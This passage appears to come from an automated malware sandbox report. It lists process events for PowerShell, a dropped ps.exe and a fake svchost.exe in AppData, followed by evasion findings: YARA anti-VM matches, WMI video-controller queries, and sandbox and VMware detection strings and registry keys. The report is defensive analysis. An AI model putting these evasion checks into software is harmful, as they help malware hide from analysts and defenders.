Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, type: MEMORY

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\mode.com	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ps.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 2436	Thread sleep time: -51103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1976	Thread sleep time: -49965s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2232	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2712	Thread sleep time: -54723s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\svchost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer

Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware ToolsH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: vmwareH
Source: powershell.exe, 0000000E.00000002.2115086772.00000000003B6000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q&%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\H
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMWAREH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIH
